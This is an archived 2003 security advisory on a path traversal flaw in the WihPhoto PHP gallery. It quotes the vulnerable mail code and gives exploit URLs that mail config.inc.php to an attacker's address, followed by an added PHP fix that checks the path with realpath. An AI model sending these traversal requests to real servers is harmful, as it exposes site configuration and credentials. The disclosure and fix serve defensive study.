[VulnWatch] WihPhoto (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/23/03

    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sun, 23 Feb 2003 18:44:58 +0100
    
    

    Information :
    -------------
    Version : 0.86-dev
    Website : http://www.wihsy.com
    Problem : All files from the hard disk can be sent by mail

    PHP Code/Location :
    -------------------
    util/email.php :

    ------------------------------------------------------------------------
    <?
    class CMailFile {
            var $subject;
            var $addr_to;
            var $text_body;
            var $text_encoded;
            var $mime_headers;
            var $mime_boundary = "--==================_846811060==_";
            var $smtp_headers;

            function CMailFile($subject,$to,$from,$msg,$filename,$mimetype = "application/octet-stream", $mime_filename = false) {
                    $this->subject = $subject;
                    $this->addr_to = $to;
                    $this->smtp_headers = $this->write_smtpheaders($from);
                    $this->text_body = $this->write_body($msg);
                    $this->text_encoded = $this->attach_file($filename,$mimetype,$mime_filename);
                    $this->mime_headers = $this->write_mimeheaders($filename, $mime_filename);
            }

            function attach_file($filename,$mimetype,$mime_filename) {
                    $encoded = $this->encode_file($filename);
                    if ($mime_filename) $filename = $mime_filename;
                    $out = "--" . $this->mime_boundary . "\n";
                    $out = $out . "Content-type: " . $mimetype . "; name=\"$filename\";\n";
                    $out = $out . "Content-Transfer-Encoding: base64\n";
                    $out = $out . "Content-disposition: attachment; filename=\"$filename\"\n\n";
                    $out = $out . $encoded . "\n";
                    $out = $out . "--" . $this->mime_boundary . "--" . "\n";
                    return $out;
    // added -- to notify email client attachment is done
            }

            function encode_file($sourcefile) {
                    if (is_readable($sourcefile)) {
                            $fd = fopen($sourcefile, "r");
                            $contents = fread($fd, filesize($sourcefile));
                            $encoded = my_chunk_split(base64_encode($contents));
                            fclose($fd);
                    }
                    return $encoded;
            }

            function sendfile() {
                    $headers = $this->smtp_headers . $this->mime_headers;
                    $message = $this->text_body . $this->text_encoded;
                    mail($this->addr_to,$this->subject,$message,$headers);
            }

    [...]

            function write_mimeheaders($filename, $mime_filename) {
                    if ($mime_filename) $filename = $mime_filename;
                    $out = "MIME-version: 1.0\n";
                    $out = $out . "Content-type: multipart/mixed; ";
                    $out = $out . "boundary=\"$this->mime_boundary\"\n";
                    $out = $out . "Content-transfer-encoding: 7BIT\n";
                    $out = $out . "X-attachments: $filename;\n\n";
                    return $out;
            }
    [...]
    }
    [...]
    ------------------------------------------------------------------------

    sendphoto.php :

    ------------------------------------------------------------------------
    include("util/email.php");

    include("config.inc.php");

    [...]
    if (!$filled) {

    print "<FORM METHOD=POST ACTION=sendphoto.php>\n";
    print "<INPUT TYPE=hidden NAME=filled VALUE=1>\n";
    print "<INPUT TYPE=hidden NAME=pic VALUE=$pic>\n";
    print "<INPUT TYPE=hidden NAME=album VALUE=";
    print rawurlencode($album);
    print ">\n";
    print "<center><p>$sendphoto_send_photo_to<br>";
    print "<INPUT NAME=sendto></input></center>\n";
    print "<p>\n";
    print "<center><INPUT TYPE=submit VALUE=\"$sendphoto_button\"></center>\n";
    print "</form>\n";
    print "</body></html>\n";

    }
    else
    {

    $message = "$sendphoto_message";
    $album1 = rawurldecode($album);
    $filetoattach = "./$pix_base/$album1/$pic";
    $mimetype = "image/jpeg";

    $newmail = new CMailFile($subject,$sendto,$replyto,$message,$filetoattach,$mimetype);
    $newmail->sendfile();

    print "$sendphoto_successful";

    print "</body></html>\n";
    }

    ?>
    ------------------------------------------------------------------------

    Exploits :
    ----------
    http://[target]/sendphoto.php?album=..&pic=config.inc.php
    or
    http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1

    where [E-MAIL] is the mailbox where http://[target]/config.inc.php will be
    sent.

    Patch :
    -------
    A patch can be found on http://www.phpsecure.info .

    More Details :
    --------------
    In French :
    http://www.frog-man.org/tutos/WihPhoto.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWihPhoto.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

    frog-m@n
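
The disclosure above works because sendphoto.php builds $filetoattach directly from the request's album and pic values. The following is an added example, not WihPhoto's code and not the phpsecure.info patch, showing one way to confine the attachment path to the photo directory; resolve_photo() and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example: resolve_photo() is a hypothetical helper, not part of WihPhoto.
function resolve_photo(string $pixBase, string $album, string $pic): ?string
{
    $base = realpath($pixBase);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", symlinks and duplicate slashes, and
    // returns false when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $album . DIRECTORY_SEPARATOR . $pic);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The canonical path must still sit below the photo root.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Only the image types the gallery is meant to mail out.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg'], true) ? $path : null;
}

// Constructed layout: <tmp>/wih_demo_<pid>/config.inc.php
//                     <tmp>/wih_demo_<pid>/pix/holiday/beach.jpg
$root = sys_get_temp_dir() . '/wih_demo_' . getmypid();
mkdir("$root/pix/holiday", 0700, true);
file_put_contents("$root/config.inc.php", "<?php // constructed placeholder\n");
file_put_contents("$root/pix/holiday/beach.jpg", "constructed placeholder bytes");

// Constructed request values; a real handler would read them explicitly
// from $_POST rather than rely on register_globals.
$requests = [
    ['album' => 'holiday', 'pic' => 'beach.jpg'],            // legitimate
    ['album' => '..',      'pic' => 'config.inc.php'],       // request from the advisory
    ['album' => 'holiday', 'pic' => '../../config.inc.php'], // same target via pic
];
foreach ($requests as $r) {
    $file = resolve_photo("$root/pix", $r['album'], $r['pic']);
    printf("album=%-8s pic=%-22s -> %s\n", $r['album'], $r['pic'],
           $file === null ? 'rejected' : 'attach ' . basename($file));
}
```

Only the first request resolves to a file under the photo root; the other two canonicalize to config.inc.php outside it and are rejected before anything is attached.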
